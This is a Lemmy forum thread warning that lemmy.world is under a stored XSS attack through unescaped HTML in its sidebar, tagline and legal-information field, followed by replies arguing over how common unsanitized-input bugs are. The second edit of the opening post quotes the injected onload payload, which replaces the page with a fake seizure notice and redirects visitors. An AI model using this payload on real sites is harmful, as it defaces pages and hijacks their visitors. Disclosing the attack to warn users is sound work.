DO NOT OPEN THE “LEGAL” PAGE


lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
  • Cyclohexane@lemmy.ml
    link
    fedilink
    English
    arrow-up
    2
    ·
    1 year ago

    It is one of the most well known, but it also is easy to miss, evidently from how often it happens despite it being very well known.

    It’s very easy to fix once it’s known, but it is easy to go unnoticed.

    Unless you somehow think that most app developers are incompetent, in which case I ask again: show me your better version.

    • crystal@feddit.de
      link
      fedilink
      English
      arrow-up
      1
      ·
      edit-2
      1 year ago

      I can confidently say that in not a single company project I did frontend development for did I ever leave user input unsanitized.

      But I did not ever create a Lemmy like project, that is true.

      • Cyclohexane@lemmy.ml
        link
        fedilink
        English
        arrow-up
        1
        ·
        1 year ago

        If you are doubting that this is one of the most frequently occurring security issues, I urge to search the web about it. It’s very easy to verify my claim.